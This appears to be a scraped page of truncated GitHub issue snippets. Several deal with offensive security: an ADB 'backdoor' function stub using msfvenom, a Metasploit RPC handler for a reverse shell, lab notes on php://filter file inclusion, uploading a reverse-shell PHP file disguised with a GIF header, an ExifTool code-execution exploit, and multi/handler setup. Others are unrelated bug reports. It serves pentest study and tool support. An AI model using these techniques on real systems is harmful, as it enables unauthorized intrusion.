-
#TODO
def backdoor():
global device
if device != 'none':
if shutil.which("msfvenom") is not None:
try:
d = adbutils.adb.device(device)
…
-
I am trying to code a connection handler for my reverse bash with the help of the examples. This is my code:
```
import time
from pymetasploit3.msfrpc import MsfRpcClient
# set up exploit
cli…
-
### Checklist
- [X] I have read through the manual page (`man fzf`)
- [X] I have searched through the existing issues
- [X] For bug reports, I have checked if the bug is reproducible in the latest ve…
chuim updated
2 weeks ago
-
#### Description
When some Windows reverse shell is spawned from within Platypus, the client window shows only the prompt twice and then it becomes unresponsive. This only affects WebUI, as shell int…
-
Scrolling on a laptop touchpad can use "Traditional" or "Natural" mode:
![image](https://github.com/user-attachments/assets/1c3dda98-3c4d-4eec-a2b2-cbd708447946)
The "natural" mode works quite wel…
-
Keypoints
- LFI using php//filter --> e.g. `http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=`
- Add GIFcode (GIF89a) in the header of reverse shell php file --> we can uploa…
-
Key points:
- searchsploit Subrion 4.2
- [PE] ExifTool 12.23 - Arbitrary Code Execution (https://www.exploit-db.com/exploits/50911) --> made a reverse shell image file `python3 50911.py -s 192.168.…
-
Hi, seeing an issue which results in a continent worth of coastline output to the error_lines table in the spatialite file, with "invalid" status - so very hard to troubleshoot. Looking the output of …
wangi updated
2 years ago
-
# Upgrade a linux reverse shell to a fully usable TTY shell | Hacker's Rest
How to upgrade a linux reverse shell to a fully usable TTY shell
[https://zweilosec.github.io/posts/upgrade-linux-shell/](…
-
## Steps to reproduce
How'd you do it?
Set up the 'sploit handler:
1. use exploit/multi/handler
2. set PAYLOAD java/jsp_shell_reverse_tcp
2. set LHOST my.host
3. set ExitOnSession false
4…